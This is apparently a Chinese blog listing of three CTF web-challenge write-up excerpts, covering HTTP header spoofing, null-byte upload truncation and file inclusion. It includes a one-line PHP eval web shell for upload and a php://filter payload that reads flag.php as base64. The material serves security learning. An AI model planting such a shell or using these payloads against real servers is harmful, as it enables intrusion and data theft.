CTF学习
Rollinon
这个作者很懒,什么都没留下…
展开
-
[极客大挑战 2019]Http_WP
打开源代码 打开WriteUp 原来我眼瞎 先补一下HTTP中的请求头和响应头属性 X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP]). 进Secret.php后 用Burp抓包重放,请求头加Referer 响应: 那就改UA呗 响应: 那就加XXF头 响应: ...原创 2020-08-12 02:48:26 · 292 阅读 · 0 评论 -
CTFHub_Web_00截断
00截断的原理 http://www.admintony.com/%E5%85%B3%E4%BA%8E%E4%B8%8A%E4%BC%A0%E4%B8%AD%E7%9A%8400%E6%88%AA%E6%96%AD%E5%88%86%E6%9E%90.html 从中可知00截断的限制 1.php版本必须小于5.3.4 2.magic_quotes_gpc=off 创建php文件 <?php @eval($_POST['pass']);?> ...原创 2020-08-10 22:19:40 · 492 阅读 · 0 评论 -
[极客大挑战 2019]Secret File_WP
打开之后,想想背景是黑色 调白之后果然发现猫腻 结果又来全黑 看来需要打开burpsuite抓包重放啊!! 进入secr3t.php后是源代码 发现有文件包含漏洞 Payload:?file=php://filter/convert.base64-encode/resource=flag.php 得到 PCFET0NUWVBFIGh0bWw+Cgo8aHRtbD4KCiAgICA8aGVhZD4KICAgICAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICAgICAgPHR原创 2020-08-10 21:03:11 · 314 阅读 · 0 评论